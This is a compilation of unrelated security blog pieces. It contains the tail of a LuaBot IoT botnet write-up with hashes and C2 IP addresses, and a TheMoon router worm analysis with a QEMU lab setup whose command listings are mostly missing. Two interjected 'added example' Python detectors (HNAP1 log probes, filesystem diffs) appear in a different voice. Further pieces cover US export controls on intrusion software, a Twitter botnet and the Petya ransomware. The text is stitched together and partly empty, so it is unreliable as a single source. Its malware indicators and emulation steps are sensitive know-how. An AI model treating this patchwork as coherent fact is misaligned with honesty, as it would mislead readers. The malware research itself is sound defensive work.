This is quite an interesting approach, because they can quickly masscan the Internet, block external access to those IoT devices and selectively infect them using the final-stage payloads.

In 2015, when I initially reported the ARRIS backdoors, there were over 600.000 vulnerable ARRIS devices exposed on the Internet and 490.000 of them had telnet services enabled:

If we perform the same query nowadays (September 2016), we can see that the number of exposed devices has been reduced to approximately 35.000:

I know that the media coverage and the security bulletins contributed to that, but I wonder how many of those devices were infected and had external access restricted by some sort of malware...

The high number of Linux devices with Internet-facing administrative interfaces, the use of proprietary backdoors, the lack of firmware updates and the ease of crafting IoT exploits make them easy targets for online criminals.

IoT botnets are becoming a thing: manufacturers have to start building secure and reliable products, ISPs need to start shipping updated devices and firmware, and end users have to keep their home devices patched and secured.

We need to find better ways to detect, block and contain this new trend. Approaches like the one from SENRIO can help ISPs and enterprises gain better visibility into their IoT ecosystems. Large-scale firmware analysis can also contribute and provide a better understanding of the security issues of those devices.


Indicators of Compromise (IOCs)

LuaBot ARMEB Binaries:
  • drop (5deb17c660de9d449675ab32048756ed)
  • .nttpd (c867d00e4ed65a4ae91ee65ee00271c7)
  • .sox (4b8c0ec8b36c6bf679b3afcc6f54442a)
  • .sox.rslv (889100a188a42369fd93e7010f7c654b)
  • .arm_puma5 (061b03f8911c41ad18f417223840bce0)

GCC Toolchains:
  • GCC: (Buildroot 2015.02-git-00879-g9ff11e0) 4.8.4
  • GCC: (GNU) 4.2.0 TI-Puma5 20100224

Dropper and CnC IPs:
  • 46.148.18.122
  • 80.87.205.92

IP Ranges whitelisted by the Attacker:
  • 46.148.18.0/24
  • 185.56.30.0/24
  • 217.79.182.0/24
  • 85.114.135.0/24
  • 95.213.143.0/24
  • 185.53.8.0/24


          Analyzing Malware for Embedded Devices: TheMoon Worm   
All the media outlets are reporting that embedded malware is becoming mainstream. This is something totally new and we had never heard of it before, right? The high number of Linux SOHO routers with Internet-facing administrative interfaces, the lack of firmware updates and the ease of crafting exploits make them a perfect target for online criminals. The Internet of Threats is wildly insecure, but definitely not unpatchable.

To all infosec people out there: it's important to understand these threats and report them properly to the media. Some top-notch researchers recently uncovered "Massive Botnets" infecting refrigerators, microwaves, gaming consoles, soda machines and tamagotchis. The problem is that they never provided any sort of evidence, no malware samples, no IoCs, and did not write a Hakin9 article describing it.

Refrigerator Botnet? Revd. Pastor Laphroaig says Show the PoC || GTFO

The aim of this post is to provide more information on identifying and executing embedded binaries, describing how to set up your own virtual lab. In case you missed it, head to the first post of the "Analyzing and Running binaries from Firmware Images" series.

TheMoon Worm

Johannes from SANS provided me with a sample of "TheMoon" malware and posted some interesting information in their handler's diary. Their honeypots captured the scanning activity and linked the exploit to a vulnerable CGI script running on specific firmware versions of the following Linksys routers: E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900.

SANS handlers classified TheMoon as a worm because of the self-replicating nature of the malware. The worm searches for a "HNAP1" URL to fingerprint and identify potentially vulnerable routers. If you check your firewall and server logs, you may find lots of different IPs probing this URL.
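As an added example (not code from the original post or from SANS), a small detector for that scanning phase: it parses Combined Log Format access-log lines, counts requests for the HNAP1 URL per source address and reports a finding once several distinct sources show up. The log lines are constructed samples using documentation IP ranges:

```python
"""Flag HNAP1 fingerprint probes in web server access logs.

Added example, not code from the original post. TheMoon requests the HNAP1 URL to
fingerprint routers before exploiting them, so the scanning phase shows up in access
logs as many unrelated sources hitting that one path. Sample lines are constructed.
"""
import re
from collections import Counter
from datetime import datetime

# Combined/Common Log Format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) \S+'
)
# The fingerprint URL itself (any case, optional trailing slash or query), not
# deeper paths that happen to start with it.
HNAP_RE = re.compile(r"^/HNAP1/?(?:\?.*)?$", re.IGNORECASE)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    try:
        ts = datetime.strptime(m.group("ts"), TS_FMT)
    except ValueError:
        return None
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path"), "status": int(m.group("status"))}


def is_hnap_probe(path):
    return HNAP_RE.match(path) is not None


def analyze(lines, min_sources=2):
    """Count HNAP1 probes per source; 'flagged' once min_sources distinct IPs probed."""
    per_ip, first, last, malformed = Counter(), {}, {}, 0
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            if line.strip():
                malformed += 1
            continue
        if not is_hnap_probe(rec["path"]):
            continue
        ip, ts = rec["ip"], rec["ts"]
        per_ip[ip] += 1
        first[ip] = min(first.get(ip, ts), ts)
        last[ip] = max(last.get(ip, ts), ts)
    return {
        "per_ip": dict(per_ip),
        "distinct_sources": len(per_ip),
        "total_probes": sum(per_ip.values()),
        "malformed_lines": malformed,
        "first_seen": min(first.values()).isoformat() if first else None,
        "last_seen": max(last.values()).isoformat() if last else None,
        "flagged": len(per_ip) >= min_sources,
    }


# Constructed sample log (documentation address ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [16/Feb/2014:10:01:02 +0000] "GET /HNAP1/ HTTP/1.1" 404 162 "-" "-"
192.0.2.44 - - [16/Feb/2014:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [16/Feb/2014:10:01:05 +0000] "GET /hnap1/ HTTP/1.1" 404 162 "-" "-"
203.0.113.7 - - [16/Feb/2014:10:01:12 +0000] "GET /HNAP1/ HTTP/1.1" 404 162 "-" "-"
this line is not in log format
198.51.100.77 - - [16/Feb/2014:10:02:30 +0000] "GET /HNAP1 HTTP/1.1" 404 162 "-" "-"
192.0.2.9 - - [16/Feb/2014:10:03:00 +0000] "GET /HNAP1/static/logo.png HTTP/1.1" 404 162 "-" "-"
""".splitlines()


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    print(f"{report['distinct_sources']} sources, {report['total_probes']} probes, "
          f"flagged={report['flagged']}")
    for ip, n in sorted(report["per_ip"].items(), key=lambda kv: -kv[1]):
        print(f"  {ip:16} {n}")
```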

The worm was named like this because it contains images from the movie "The Moon". It's possible to carve a few PNGs out of the ELF binary:


Identifying the Binary

A total of seven different samples were provided; they all seem to be variants of the same malware, judging by the ssdeep matching score.


Let's start by running the file utility and readelf to identify the architecture (MIPS R3000 / Little Endian):


The EXr.pdf variant (MD5 88a5c5f9c5de5ba612ec96682d61c7bb) had a VirusTotal detection rate of 3 / 50 on 2014-02-16.



QEMU

We'll be using QEMU to run the binaries in a controlled environment. I commonly use two different setups to run MIPS Linux binaries, both based on the Malta platform.

OpenWRT MIPS

The OpenWRT Malta CoreLV platform is intended to be used with QEMU (in big- or little-endian mode). The install procedure is pretty straightforward using OpenWRT Buildroot. OpenWrt Buildroot is the build system for the distribution and it works on Linux, BSD or macOS. In case you didn't remember, the authors of the Carna Botnet used it to cross-compile their binaries.

Installing prerequisites (on your favorite Debian Derivative):

Now head to the openwrt folder and set the proper settings for your Linux kernel, choosing "MIPS Malta CoreLV board (qemu)" as the Target System and "Little Endian" as the subtarget. Don't forget to save the config.




Now build your image (use the -j switch to speed up if you have multiple cores, e.g "-j 3"):



Your image will be ready after a couple of minutes. Now you need to install the QEMU full-system emulation binaries and start it with the right command switches:


To exit the console simply hit CTRL+A followed by C and Q.

If you want to connect your emulated machine to a real network, follow the steps from Aurelien's blog or simply run the following commands to get Internet access:

If you don't want to compile the Kernel by yourself, you can grab the pre-compiled binaries from here or here (at your own risk).

You may remember that it was not possible to run busybox-simet using the standalone qemu-mips-static. It's possible to fix that by manually patching QEMU, or you can run it inside the proper virtual machine (OpenWRT Malta MIPS/Big Endian):


Debian MIPS Linux

I won't describe how to set up your Debian MIPS Linux because Zach Cutlip already did an amazing job describing it in this blog post. The process is quite similar to the OpenWRT one and, if you're too lazy to build your own environment, Aurelien provides pre-compiled binaries here. Don't forget to set up your network connections properly.

Dynamic Analysis

In order to emulate the Linksys environment, let's download and unpack the firmware for the E2500v2 (v1.0.07).

Let's copy and extract the root filesystem (e2500.tar.gz) and the malicious binary (EXr.pdf) to our test machine (Debian MIPS). Remember to copy the worm to the appropriate "/tmp" folder. Back up your QEMU image, start sniffing the connections from the bridged network (tap1 in my case) and bind the necessary pseudo-devices into the chrooted path. You can run the binary directly on your Debian MIPS environment, but using chroot and the target filesystem is highly recommended. If you try to chroot and run the worm without linking these devices, it will refuse to run and won't drop the second-stage binary.

You can use strace to log the syscalls and start your chrooted shell to run the malicious binary. I had some issues using strace on the 2.6.32 Debian MIPS kernel (vmlinux-2.6.32-5-4kc-malta). The 3.2.0 version (vmlinux-3.2.0-4-4kc-malta) seems to run fine.



If you don't want to use strace, simply start a chrooted sh and run the malware:


The worm tries to remove files with certain extensions and performs a series of system checks. After a few seconds the binary is removed from /tmp/ and three files are written to disk: .L26 (PID), .L26.lunar (Lunar Base URL) and .L26.out (debug log).


It's possible to dump QEMU's physical memory using the pmemsave command by hitting CTRL+A, C (to enter QEMU's administrative interface) and entering:



The 256MB raw dump will be saved to your host's local path. You can now try to use Volatility or run strings against it.



The worm starts scanning for ports 80 and 8080 on a hardcoded list of networks. If the /HNAP/ URL returns a string identifying the targeted routers, the malware sends an HTTP POST trying to exploit a command injection in the vulnerable CGI.





Decoded POST:


TheMoon will also start an HTTPS server ("Lunar Base") on the router using the random port recorded in the .L26.lunar file. The certificate's Common Name, Organization and Organizational Unit are hardcoded and the other values seem to be random. Trying to find these entries in the scans.io SSL certificate datasets would be really interesting.


The HTTPS server hosts three files: gerty.png, lunar.png and favicon.ico:




Rkhunter reports a few warnings on the infected system. I have uploaded the complete output from rkhunter to Pastebin; get it here.


Another useful technique is to compare the contents of the filesystem with a known-good template. You can use binwally, WinMerge or binwalk's hashmatch.
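An added example of that comparison, written here rather than taken from binwally, hashmatch or the post: hash two directory trees and report added, removed and modified paths, so the worm's dropped files under /tmp stand out against a clean extract of the same firmware. Both trees and their contents are constructed placeholders:

```python
"""Diff a suspect filesystem against a known-good template by file hash.

Added example; not binwally, hashmatch or code from the original post. Every regular
file and symlink under two trees is hashed and the result classified as added,
removed, modified or unchanged. The demo trees are constructed placeholders.
"""
import hashlib
import os
import tempfile
from pathlib import Path


def _sha256_file(path, chunk=1 << 16):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def hash_tree(root):
    """Map each regular file and symlink under root (POSIX relative path) to a digest.
    Symlinks are not followed: the link target string is hashed instead, so a link
    that was repointed shows as modified and a link outside the tree is never read."""
    root = Path(root)
    digests = {}
    for dirpath, _dirs, files in os.walk(root, followlinks=False):
        for name in files:
            p = Path(dirpath) / name
            rel = p.relative_to(root).as_posix()
            if p.is_symlink():
                target = os.readlink(p).encode()
                digests[rel] = "symlink:" + hashlib.sha256(target).hexdigest()
            elif p.is_file():
                digests[rel] = _sha256_file(p)
    return digests


def compare_trees(baseline, observed):
    """Classify paths as added / removed / modified / unchanged (sorted lists)."""
    b, o = set(baseline), set(observed)
    both = b & o
    return {
        "added": sorted(o - b),
        "removed": sorted(b - o),
        "modified": sorted(p for p in both if baseline[p] != observed[p]),
        "unchanged": sorted(p for p in both if baseline[p] == observed[p]),
    }


def _write(root, rel, data):
    p = Path(root) / rel
    p.parent.mkdir(parents=True, exist_ok=True)
    p.write_bytes(data)


def build_demo_trees(base):
    """Construct a clean template and a suspect copy carrying the worm's artefacts.
    All contents are placeholders (the .L26 files hold made-up values)."""
    clean, suspect = Path(base) / "clean", Path(base) / "suspect"
    for root in (clean, suspect):
        _write(root, "bin/busybox", b"placeholder busybox bytes")
        _write(root, "etc/passwd", b"root:x:0:0:root:/root:/bin/sh\n")
        _write(root, "www/index.html", b"<html>router</html>\n")
        os.symlink("busybox", root / "bin/sh")
    # Differences exist only on the suspect side.
    _write(suspect, "etc/passwd", b"root:x:0:0:root:/root:/bin/sh\n# changed\n")
    _write(suspect, "tmp/.L26", b"1234\n")
    _write(suspect, "tmp/.L26.lunar", b"placeholder-lunar-base-url\n")
    _write(suspect, "tmp/.L26.out", b"placeholder debug log\n")
    (suspect / "www/index.html").unlink()          # a file the worm deleted
    os.remove(suspect / "bin/sh")                   # a repointed symlink
    os.symlink("/tmp/.L26", suspect / "bin/sh")
    return clean, suspect


def demo():
    """Run the comparison on the constructed trees and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, suspect = build_demo_trees(tmp)
        return compare_trees(hash_tree(clean), hash_tree(suspect))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:9} {paths}")
```

For a real comparison, point hash_tree() at the extracted clean firmware root and at the filesystem copied out of the emulated machine.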




Conclusion

I did not spend much time reversing the files and their functions, as the main purpose of this post was to provide information to identify and execute embedded binaries, describing how to set up your own virtual lab using QEMU.

It's still possible to improve the analysis by faking the nvram, running a GDB server with QEMU or using Volatility with the proper profile and debugging structures, but this post is already way too long. You should also have a look at Avatar, from EURECOM. Avatar's goal is to enable complex dynamic analysis of embedded firmware in order to assist in a wide range of security-related activities, including malware analysis, reverse engineering and vulnerability discovery.

Let's keep drawing public awareness to the security issues of the Internet of Threats, persuading manufacturers, ISPs and end users to collaborate to address these problems.




Found, linked, commented – February 9, 2014
Corporate Viral Advertising Zombie Botnets Need a Shovel to the Head — Medium: Perhaps the dumbest advertising attempt on Twitter ever. Using spam to imitate a zombie attack against high-profile Twitter users. Who could possibly be pleased by such a thing? Mittmedia börjar trycka dagtid | Medievärlden: So the death of newspapers has now arrived for real in […]
ZombieCoin – Using Bitcoin’s Network To Create Next Generation Botnets

A botnet represents a network of a large number of compromised machines, which are distinctively referred to as bots or zombies, and are remotely controlled by the “botmaster”. Botnets were originally coded to act as means for vandalism and to “show off” hacking skills, yet they have presently evolved into sophisticated tools that are continuously ...

The post ZombieCoin – Using Bitcoin’s Network To Create Next Generation Botnets appeared first on Deep Dot Web.


Proposed Changes in Export Control

The U.S. limits the export of certain high-tech items that might be used inappropriately (from the government’s point of view). This is intended to prevent (or slow) the spread of technologies that could be used in weapons, used in hostile intelligence operations, or used against a population in violation of their rights. Some are obvious, such as nuclear weapons technology and armor piercing shells. Others are clear after some thought, such as missile guidance software and hardware, and stealth coatings. Some are not immediately clear at all, and may have some benign civilian uses too, such as supercomputers, some lasers, and certain kinds of metal alloys.

Recently, there have been some proposed changes to the export regulations for some computing-related items. In what follows, I will provide my best understanding of both the regulations and the proposed changes. This was produced with the help of one of the professional staff at Purdue who works in this area, and also a few people in USACM who provided comments (I haven’t gotten permission to use their names, so they’re anonymous for now). I am not an expert in this area so please do not use this to make important decisions about what is covered or what you can send outside the country! If you see something in what follows that is in error, please let me know so I can correct it. If you think you might have an export issue under this, consult with an appropriate subject matter expert.

Export Control

Some export restrictions are determined, in a general way, as part of treaties (e.g., nuclear non-proliferation). A large number are as part of the Wassenaar Arrangement — a multinational effort by 41 countries generally considered to be allies of the US, including most of NATO; a few major countries such as China are not, nor are nominal allies such as Pakistan and Saudi Arabia (to name a few). The Wassenaar group meets regularly to review technology and determine restrictions, and it is up to the member states to pass rules or legislation for themselves. The intent is to help promote international stability and safety, although countries not within Wassenaar might not view it that way.

In the U.S., there are two primary regulatory regimes for exports: ITAR and EAR. ITAR is the International Traffic in Arms Regulations in the Directorate of Defense Trade Controls at the Department of State. ITAR provides restrictions on sale and export of items of primary (or sole) use in military and intelligence operations. The EAR is the Export Administration Regulations in the Bureau of Industry and Security at the Department of Commerce. EAR rules generally cover items that have “dual use” — both military and civilian uses.

These are extremely large, dense, and difficult to understand sets of rules. I had one friend label these as “clear as mud.” After going through them for many hours, I am convinced that mud is clearer!

Items designed explicitly for civilian applications without consideration to military use, or with known dual-use characteristics, are not subject to the ITAR because dual-use and commodity items are explicitly exempted from ITAR rules (see sections 121.1(d) and 120.41(b) of the ITAR). However, being exempt from ITAR does not make an item exempt from the EAR!

If any entity in the US — company, university, or individual — wishes to export an item that is covered under one of these two regimes, that entity must obtain an export license from the appropriate office. The license will specify what can be exported, to what countries, and when. Any export of a controlled item without a license is a violation of Federal law, with potentially severe consequences. What constitutes an export is broader than some people may realize, including:

  • Shipping something outside the U.S. as a sale or gift is an export, even if only a single instance is sent.
  • Sending something outside the U.S. under license, knowing (or suspecting) it will then be sent to a 3rd location is a violation.
  • Providing a controlled item to a foreign-controlled company or organization even if in the U.S. may be an export.
  • Providing keys or passwords that would allow transfer of controlled information or materials to a foreign national is an export
  • Designing or including a controlled item in something that is not controlled, or which separately has a license, and exporting that may be a violation.
  • Giving a non-U.S. person (someone not a citizen or permanent resident) access to an item to examine or use may be an export.
  • Providing software, drawings, pictures, or data on the Internet, on a DVD, on a USB stick, etc to a non-U.S. person may be an export

Those last two items are what as known as a deemed export because the item didn’t leave the U.S., but information about it is given to a non-US person. There are many other special cases of export, and nuances (giving control of a spacecraft to a foreign national is prohibited, for example, as are certain forms of reexport). This is all separate from disclosure of classified materials, although if you really want trouble, you can do both at the same time!

This whole export thing may seem a bit extreme or silly, especially when you look at the items involved, but it isn’t — economic and military espionage to get this kind of material and information is a big problem, even at research labs and universities. Countries that don’t have the latest and greatest factories, labs, and know-how are at a disadvantage both militarily and economically. For instance, a country (e.g., Iran) that doesn’t have advanced metallurgy and machining may not be able to make specialized items (e.g., the centrifuges to separate fissionable uranium), so they will attempt to steal or smuggle the technology they need. The next best approach is to get whatever knowledge is needed to recreate the expertise locally. You only need to look at the news over a period of a few months to see many stories of economic theft and espionage, as well as state-sponsored incidents.

This brings us to the computing side of things. High speed computers, advanced software packages, cryptography, and other items all have benign commercial uses. However, they all also have military and intelligence uses. High speed computers can be used in weapons guidance and design systems, advanced software packages can be used to model and refine nuclear weapons and stealth vehicles, and cryptography can be used to hide communications and data. As such, there are EAR restrictions on many of these items. However, because the technology is so ubiquitous and the economic benefit to the U.S. is so significant, the restrictions have been fairly reasonable to date for most items.

Exemptions

Software is a particularly unusual item to regulate. The norm in the community (for much of the world) is to share algorithms and software. By its nature, huge amounts of software can be copied onto small artifacts and taken across the border, or published on an Internet archive. In universities we regularly give students from around the world access to advanced software, and we teach software engineering and cryptography in our classes. Restriction on these kinds of items would be difficult to enforce, and in some cases, simply silly to restrict.

Thus, the BIS export rules contain a number of exemptions that remove some items from control entirely. (In the following, designations such as 5D002 refer to classes of items as specified in the EAR, and 734.8 refers to section 734 paragraph 8.)

  • EAR 734.3(b.3) exempts technology (except software classified under 5D002, primarily cryptography) if it
    • arises from fundamental research (described in 734.8), or
    • is already published or will be published (described in 734.7), or
    • is educational information (described in 734.9).
    Exempt from 5D002 is any printed source code, including encryption code, or object code whose corresponding source code is otherwise exempt. See also my note below about 740.13(e.3).
  • EAR 734.7 defines publication as appearing in books, journals, or any media that is available for free or at a price not to exceed the cost of distribution; or freely available in libraries; or released at an open gathering conference, meeting, or seminar open to the qualified public; or otherwise made available,
  • EAR 734.8 defines fundamental research that is ordinarily published in the course of that research.
  • EAR 734.9 defines educational information (which is excluded from the EAR) as information that is released by instruction in catalog courses and associated teaching laboratories of academic institutions. This provision applies to all information, software or technology except certain encryption software, but if the source code of encryption software is publicly available as described in 740.13(e), it can also be considered educational information.
  • We still have some deemed export issues if we are doing research that doesn’t meet the definition of fundamental research (e.g. because it requires signing an NDA or there is a publication restriction in the agreement) and a researcher or recipient involved is not a US person (citizen or permanent resident) employed full time by the university, and with a permanent residence in the US, and is not a national of a D:5 country (Afghanistan, Belarus, Burma, the CAR, China (PRC), the DRC, Côte d’Ivoire, Cuba, Cyprus, Eritrea, Fiji (!), Haiti, Iran, Iraq, DPRK, Lebanon, Liberia, Libya, Somalia, Sri Lanka, Sudan, Syria, Venezuela, Vietnam, Zimbabwe). However, that is easily flagged by contracts officers and should be the norm at most universities or large institutions with a contracts office.
  • EAR 740.13(d) exempts certain mass-market software that is sold retail and installed by end-users so long as it does not contain cryptography with keys longer than 64 bits.

The exemption for publication is interesting. Anyone doing research on controlled items appears to have an exemption under EAR 740.13(e) where they can publish (including posting on the Internet) the source code from research that falls under ECCN 5D002 (typically, cryptography) without restriction, but must notify BIS and NSA of digital publication (email is fine, see 740.13(e.3)); there is no restriction or notification requirement for non-digital print. What is not included is any publication or export (including deemed export) of cryptographic devices or object code not otherwise exempt (object code whose corresponding source code is exempt is itself exempt), or for knowing export to one of the prohibited countries (E:1 from supplement 1 of section 740 — Cuba, Iran, DPRK, Sudan and Syria, although Cuba may have just been removed.)

As part of an effort to harmonize the EAR and ITAR, a proposed revision to both has been published on June 3 (80 FR 31505) that has a nice side-by-side chart of some of these exemptions, along with some small suggested changes.

Changes

The Wassenaar group agreed to some changes in December 2013 to include intrusion software and network monitoring items of certain kinds on their export control lists. The E.U. adopted new rules in support of this in October of 2014. On May 20, 2015, the Department of Commerce published — in the Federal Register (80 FR 28853) — a request for comments on its proposed rule to amend the EAR. Specifically, the notice stated:

The Bureau of Industry and Security (BIS) proposes to implement the agreements by the Wassenaar Arrangement (WA) at the Plenary meeting in December 2013 with regard to systems, equipment or components specially designed for the generation, operation or delivery of, or communication with, intrusion software; software specially designed or modified for the development or production of such systems, equipment or components; software specially designed for the generation, operation or delivery of, or communication with, intrusion software; technology required for the development of intrusion software; Internet Protocol (IP) network communications surveillance systems or equipment and test, inspection, production equipment, specially designed components therefor, and development and production software and technology therefor. BIS proposes a license requirement for the export, reexport, or transfer (in-country) of these cybersecurity items to all destinations, except Canada. Although these cybersecurity capabilities were not previously designated for export control, many of these items have been controlled for their "information security" functionality, including encryption and cryptanalysis. This rule thus continues applicable Encryption Items (EI) registration and review requirements, while setting forth proposed license review policies and special submission requirements to address the new cybersecurity controls, including submission of a letter of explanation with regard to the technical capabilities of the cybersecurity items. BIS also proposes to add the definition of "intrusion software" to the definition section of the EAR pursuant to the WA 2013 agreements. The comments are due Monday, July 20, 2015.

The actual modifications are considerably more involved than the above paragraph, and you should read the Federal Register notice to see the details.

This proposed change has caused some concern in the computing community, perhaps because the EAR and ITAR are so difficult to understand, and because of the recent pronouncements by the FBI seeking to mandate “back doors” into communications and computing.

The genesis of the proposed changes is stated to match the Wassenaar additions of (basically) methods of building, controlling, and inserting intrusion software; technologies related to the production of intrusion software; technology for IP network analysis and surveillance, or for the development and testing of same. These are changes to support national security, regional stability, and counter terrorism.

According to the notice, intrusion software includes items that are intended to avoid detection or defeat countermeasures such as address randomization and sandboxing, and exfiltrate data or change execution paths to provide for execution of externally provided instructions. Debuggers, hypervisors, reverse engineering, and other software tools are exempted. Software and technology designed or specially modified for the development, generation, operation, delivery, or communication with intrusion software is controlled — not the intrusion software itself. It is explicitly stated that rootkits and zero-day exploits will presumptively be denied licenses for export.

The proposed changes for networking equipment/systems would require that it have all 5 of the following characteristics to become a controlled item:

  1. It operates on a carrier class IP network (e.g., national grade backbone)
  2. Performs analysis at OSI layer 7
  3. Extracts metadata and content and indexes what it extracts
  4. Executes searches based on hard selectors (e.g., name, address)
  5. Performs mapping of relational networks among people or groups

Equipment specially designed for QoS, QoE, or marketing is exempt from this classification.

Two other proposed changes would remove the 740.13(d) exemption for mass-market products, and would make software that is controlled by one of these new sections and that contains encryption dual-listed in two categories. There are other changes for wording, cleaning up typos, and so on.

I don’t believe there are corresponding changes to ITAR because these all naturally fall under the EAR.

Discussion

Although social media has had a number of people posting vitriol and warnings of the impending Apocalypse, I can’t see it in this change. If anything, this could be a good thing — people who are distributing tools to build viruses, botnets, rootkits and the like may now be prosecuted. The firms selling network monitoring equipment that is being used to oppress political and religious protesters in various countries may now be restrained. The changes won’t harm legitimate research and teaching, because the exemptions I listed above will still apply in those cases. There are no new restrictions on defensive tools. There are no new restrictions on cryptography.

Companies and individuals making software or hardware that will fall under these new rules will now have to go through the process of applying for export licenses. It may also be the case that those entities find their markets reduced. I suspect that it is a small population that will be subject to such a restriction, and for some of them, given their histories, I’m not at all bothered by the idea.

I have seen some analyses that claim that software to jailbreak cellphones might now be controlled. However, if published online without fee (as is often the case), it would be exempt under 734.7. It arguably is a debugging tool, which is also exempt.

I have also seen claims that any technology for patching would fall under these new rules. Legitimate patching doesn’t seek to avoid detection or defeat countermeasures, which are specifically defined as “techniques designed to ensure the safe execution of code.” Thus, legitimate patching won’t fall within the scope of control.

Jennifer Granick wrote a nice post about the changes. She rhetorically asked at the end whether data loss prevention tools would fall under this new rule. I don’t see how — those tools don’t operate on national grade backbones or index the data they extract. She also posed a question about whether this might hinder research into security vulnerabilities. Given that fundamental research is still exempt under 734.8 as are published results under 734.7, I don’t see the same worry.

The EFF also posted about the proposed rule changes, with some strong statements against them. Again, the concern they stated is about researchers and the tools they use. As I read the EAR and the proposed rule, this is not an issue if the source code for any tools that are exported is published, as per 734.7. The only concern would be if the tools were exported and the source code was not publicly available, i.e., private tools exported. I have no idea how often this happens; in my experience, either the tools are published or else they aren’t shared at all, and neither case runs afoul of the rule. The EFF post also tosses up fuzzing, vulnerability reporting, and jailbreaking as possible problems. Fuzzing tools might possibly be a problem under a strict interpretation of the rules, but the research and publication exemptions would seem to come to the rescue. Jailbreaking I addressed, above. I don’t see how reporting vulnerabilities would be export of technology or software for building or controlling intrusion software, so maybe I don’t understand the point.

At first I was concerned about how this rule might affect research at the university, or the work at companies I know about. As I have gotten further into it, I am less and less worried. It seems that there are very reasonable exceptions in place, and I have yet to see a good example of something we might legitimately want to do that would now be prohibited under these rules.

However, your own reading of the proposed rule changes may differ from mine. If so, note the difference in a comment to this essay and I’ll either respond privately or post your comment. Of course, commenting here won’t affect the rule! If you want to do that, you should use the formal comment mechanism listed in the Federal Register notice, on or before July 20, 2015.




Update July 17: The BIS has an (evolving) FAQ on the changes posted online. It makes clear the exemptions I described, above. The regulations only cover tools specially designed to design, install, or communicate with intrusion software as they define it. Sharing of vulnerabilities and proof of exploits is not regulated. Disclosing vulnerabilities is not regulated so long as the sharing does not include tools or technologies to install or operate the exploits.

As per the two blog posts I cite above:

  • research into security vulnerabilities is explicitly exempt so long as it is simply the research
  • export of vulnerability toolkits and intrusion software would be regulated if those tools are not public domain
  • fuzzing is explicitly listed as exempt because it is not specifically for building intrusion software
  • jailbreaking is exempt, as are publicly available tools for jailbreaking. Tools to make jailbreaks would likely be regulated.

Look at the FAQ for more detail.


Twitter transformed into botnet command channel
For the past couple weeks, Twitter has come under attacks that besieged it with more traffic than it could handle. Now comes evidence that the microblogging website is being used to feed the very types of infected machines that took it out of commission.
Raph's Website: The Internet as existential threat

Some days I wonder if we are completely screwed. So today’s post is a perhaps slightly hysterical outburst.

The news is not paying enough attention to the Petya/NotPetya ransomware, and the effects it is having on the Ukraine and on a bunch of businesses worldwide. I think it may be a harbinger of how the Internet could kill us all.

Based on what little I have read so far… A piece of widely used tax software — one used by the Ukrainian government — did its usual “phone home” to check for updates. Instead of getting back a few hundred bytes of acknowledgement, it got a viral payload. Basically, this tax software served as a means of auto-updating the virus to thousands of targets. The result is not just accounting systems down, though. It’s gas stations and point of sale systems in grocery stores.

This kind of thing basically makes me wonder how long we’ll have the Internet.

The whole premise of the Internet is the connecting of disparate networks. It started out by only connecting computer networks. But today it connects networks of vastly different sorts: computers, yes, but also financial networks, distribution networks, road networks, water networks, power networks, communication networks, social networks. It truly is “Inter” now.

As we rush towards putting more and more things “in the cloud,” as we rush towards an Internet of Things with no governance beyond profit motive and anarchy, what we’re effectively doing is creating a massive single point of failure for every system we put in it.

Think of a house with an alarm system on the doors, and a phone system, and power coming into the house, and water pipes, and so on. In your house these are probably all separate connections to separate networks. If the water stops running, you don’t tend to think that your phone will go down too. But you know that cutting the power at the mains renders the house vulnerable in a host of ways, because so many things do connect to the electricity.

Well, even without going so far as to buy Internet-enabled juicers, quite a lot of that stuff actually has been connected to one point of failure, and it’s not necessarily all things we term “critical infrastructure.”

What we are building is basically a perfect scenario for collapse, where a commons is consumed by actors who either don’t care or don’t understand the collective damage that is possible in a connected system, and the tipping points that can ensue.

Most networks we come across in the real world follow power-law distributions, and are what we term “scale-free networks.” Basically, this is where most nodes on the network aren’t that important, but there’s a preferential attachment thing going on, where some nodes are super-connectors. They’re really hard to destroy; you have to take out the biggest nodes, all at once. But if a power-law network is co-opted, you have a real problem. The Internet is basically our biggest node now.

Most of the big virus scares lately have been traced in one way or another back to state actors; Petya is based on an exploit the NSA kept secret, that was then leaked to the general public, and weaponized by hackers. As huge as their effects have been, consider that this implies fairly limited use. But picture a world where these tools of state actors are actually in the hands of random people, and released at the frequencies that random people would engage in. I remember being in South Korea in the mid-2000s, and watching a colleague’s laptop get owned instantly just from connecting to hotel wifi without firewalls up. Within ten seconds, the laptop was completely useless, locked up, conquered totally. Picture an Internet like that. In such a world, the only people who can connect would be the ones with the wherewithal to do so, the money and the savvy and the ability to actually harden security.

But just as critically, governments and state actors seem to be the source of so many of the problems precisely because the Internet is now too many forms of critical infrastructure, and therefore too juicy a target. If software eats everything, then the ability to kill software is the ability to kill anything. Net connectivity becomes the single point of failure for every system connected to it.

Even if the Net itself is designed to route around damage, that doesn’t help if it is the single vector of attack that can take down any given target. It’s too juicy a target for the military, too juicy a target for terror, too juicy a target for criminal ransom.

The old adage goes “when they came for this, I said nothing. When they came for that…” — we all know it. Consider that the more we hand gleefully over to the cloud because we want convenience, big data, personalization, and so on, we’re creating a single thing that can be taken from us in an instant. We’ve decided to subscribe to everything, instead of owning it. When they came for your MP3s, your DVDs, fine, not “critical infrastructure.” When they came for your resumes, OK, getting closer.

